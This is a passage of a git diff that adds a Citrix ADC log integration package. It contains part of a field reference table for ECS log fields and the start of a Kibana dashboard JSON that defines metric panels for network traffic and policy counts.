| | keyword | +| citrix_adc.log.username | | keyword | +| citrix_adc.log.valid_from | | date | +| citrix_adc.log.valid_to | | date | +| citrix_adc.log.value | | keyword | +| citrix_adc.log.violation_type | | keyword | +| citrix_adc.log.vserver.ip | | ip | +| citrix_adc.log.vserver.port | | long | +| citrix_adc.log.watch_id | | keyword | +| client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| client.as.organization.name | Organization name. | keyword | +| client.as.organization.name.text | Multi-field of `client.as.organization.name`. | match_only_text | +| client.domain | The domain name of the client system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| client.geo.city_name | City name. | keyword | +| client.geo.continent_name | Name of the continent. | keyword | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.geo.country_name | Country name. | keyword | +| client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| client.port | Port of the client. | long | +| client.user.name | Short name or login of the user. | keyword | +| client.user.name.text | Multi-field of `client.user.name`. | match_only_text | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date | +| event.dataset | Event dataset | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If event.start and event.end are known this value should be the difference between the end and start time. | long | +| event.end | event.end contains the date when the event ended or when the activity was last observed. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. | keyword | +| event.module | Event module | constant_keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | event.start contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.id | A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| input.type | Input type. | keyword | +| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword | +| log.offset | Offset of the entry in the log file. | long | +| log.source.address | Source address from which the log event was read / sent from. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.bytes | Total bytes transferred in both directions. If `source.bytes` and `destination.bytes` are known, `network.bytes` is their sum. | long | +| network.community_id | A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. Learn more at https://github.com/corelight/community-id-spec. | keyword | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.iana_number | IANA Protocol Number (https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml). Standardized list of protocols. This aligns well with NetFlow and sFlow related logs which use the IANA Protocol Number. | keyword | +| network.inner | Network.inner fields are added in addition to network.vlan fields to describe the innermost VLAN when q-in-q VLAN tagging is present. Allowed fields include vlan.id and vlan.name. Inner vlan fields are typically used when sending traffic with multiple 802.1q encapsulations to a network sensor (e.g. Zeek, Wireshark.) | group | +| network.inner.vlan.id | VLAN ID as reported by the observer. | keyword | +| network.inner.vlan.name | Optional VLAN name as reported by the observer. | keyword | +| network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| network.type | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc The field value must be normalized to lowercase for querying. | keyword | +| observer.egress.interface.name | Interface name as reported by the system. | keyword | +| observer.egress.zone | Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. | keyword | +| observer.hostname | Hostname of the observer. | keyword | +| observer.ingress.interface.name | Interface name as reported by the system. | keyword | +| observer.ingress.zone | Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. | keyword | +| observer.ip | IP addresses of the observer. | ip | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| observer.version | Observer version. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.pid | Process id. | long | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| server.address | Some event server addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| server.domain | The domain name of the server system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| server.ip | IP address of the server (IPv4 or IPv6). | ip | +| server.port | Port of the server. | long | +| server.user.name | Short name or login of the user. | keyword | +| server.user.name.text | Multi-field of `server.user.name`. | match_only_text | +| source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | +| source.as.organization.name.text | Multi-field of `source.as.organization.name`. | match_only_text | +| source.bytes | Bytes sent from the source to the destination. | long | +| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| source.geo.city_name | City name. | keyword | +| source.geo.continent_name | Name of the continent. | keyword | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.geo.country_name | Country name. | keyword | +| source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip | +| source.nat.port | Translated port of source based NAT sessions. (e.g. internal client to internet) Typically used with load balancers, firewalls, or routers. | long | +| source.port | Port of the source. | long | +| source.user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| source.user.group.name | Name of the group. | keyword | +| source.user.name | Short name or login of the user. | keyword | +| source.user.name.text | Multi-field of `source.user.name`. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| url.fragment | Portion of the url after the `#`, such as "top". The `#` is not part of the fragment. | keyword | +| url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard | +| url.full.text | Multi-field of `url.full`. | match_only_text | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.password | Password of the request. | keyword | +| url.path | Path of the request, such as "/search". | wildcard | +| url.port | Port of the request, such as 443. | long | +| url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | +| url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| url.username | Username of the request. | keyword | +| user.email | User email address. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | diff --git a/packages/citrix_adc/img/citrix_adc-log-dashboard.png b/packages/citrix_adc/img/citrix_adc-log-dashboard.png new file mode 100644 index 00000000000..aced8e5f588 Binary files /dev/null and b/packages/citrix_adc/img/citrix_adc-log-dashboard.png differ diff --git a/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json b/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json new file mode 100644 index 00000000000..1a2b320dcd7 --- /dev/null +++ b/packages/citrix_adc/kibana/dashboard/citrix_adc-95709fd0-e130-11ee-adb0-b71252739438.json @@ -0,0 +1,3613 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"6ab2c79f-26b6-40d8-b815-11f62306ce5b\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6ab2c79f-26b6-40d8-b815-11f62306ce5b\",\"fieldName\":\"citrix.priority\",\"title\":\"Priority\",\"enhancements\":{}}},\"7849d87b-cbf3-47c3-b808-135dbf36be2b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7849d87b-cbf3-47c3-b808-135dbf36be2b\",\"fieldName\":\"citrix.device_event_class_id\",\"title\":\"Event Class\",\"enhancements\":{}}},\"6351864e-e4f7-4e0e-87be-cfbadfc617e5\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6351864e-e4f7-4e0e-87be-cfbadfc617e5\",\"fieldName\":\"citrix.name\",\"title\":\"Event Name\",\"enhancements\":{}}},\"65ecce3a-f292-4786-bbe8-5d9a0964a5ce\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"65ecce3a-f292-4786-bbe8-5d9a0964a5ce\",\"fieldName\":\"citrix.facility\",\"title\":\"Facitity\",\"enhancements\":{},\"selectedOptions\":[]}}}" + }, + "description": "Overview of the Logs collected by the Citrix ADC.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### Citrix ADC\n\n#### Overview\nThis dashboard provides a streamlined view of your network's health and security using Log Data-stream. It provides metrics for total allowed and denied policies, TCP connections and UDP flows, and source and destination bytes. It also provides overview of events on the basis of network protocol, network transport, priority, action, class, name, and top 10 of Source IP, Destination IP, Client IP, Server IP, Source countries, Client countries, Request domain, Request path and Request query. It gives information of severity and events over time.\n\n[**Integration Page**](/app/integrations/detail/citrix_adc/overview)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 33, + "i": "28c460d2-8a65-48ce-8387-37708452304c", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "28c460d2-8a65-48ce-8387-37708452304c", + "title": "Table of Contents", + "type": "visualization", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a4952cfd-1931-44ff-a055-45881e87fbf9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Policies Denied", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_policies_denied" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a4952cfd-1931-44ff-a055-45881e87fbf9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "f7acb623-11e3-4403-9b9b-fc30630b7449", + "w": 12, + "x": 12, + "y": 0 + }, + "panelIndex": "f7acb623-11e3-4403-9b9b-fc30630b7449", + "title": "Total Policies Denied [Logs Citrix ADC] ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "45a5b385-2216-447e-b0cd-f480a8a4c212", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total UDP Flows", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_udp_flows" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "45a5b385-2216-447e-b0cd-f480a8a4c212", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "5e9be0e0-4605-4e82-89e2-d18942be9929", + "w": 12, + "x": 24, + "y": 0 + }, + "panelIndex": "5e9be0e0-4605-4e82-89e2-d18942be9929", + "title": "Total UDP Flows [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57891f44-e3cc-4c13-a561-98af9b658060", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Source Bytes", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "source.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "57891f44-e3cc-4c13-a561-98af9b658060", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2", + "title": "Source Bytes [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a67fd70d-3451-43ad-8947-9549dde00283", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Policies Allowed", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_policies_allowed" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a67fd70d-3451-43ad-8947-9549dde00283", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "2dfcb670-693f-4f10-9717-e4056e66a4f1", + "w": 12, + "x": 12, + "y": 9 + }, + "panelIndex": "2dfcb670-693f-4f10-9717-e4056e66a4f1", + "title": "Total Policies Allowed [Logs Citrix ADC] ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "90bfe744-969a-453e-af29-e3ef2dd9cc25", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total TCP Connections", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "citrix_adc.log.total_tcp_connections" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "90bfe744-969a-453e-af29-e3ef2dd9cc25", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b", + "w": 12, + "x": 24, + "y": 9 + }, + "panelIndex": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b", + "title": "Total TCP Connections [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e2506703-c355-4307-9b8c-623fa77c78a6": { + "columnOrder": [ + "a95bb479-ae81-400c-a6bc-520017a50865" + ], + "columns": { + "a95bb479-ae81-400c-a6bc-520017a50865": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Destination Bytes", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "destination.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": 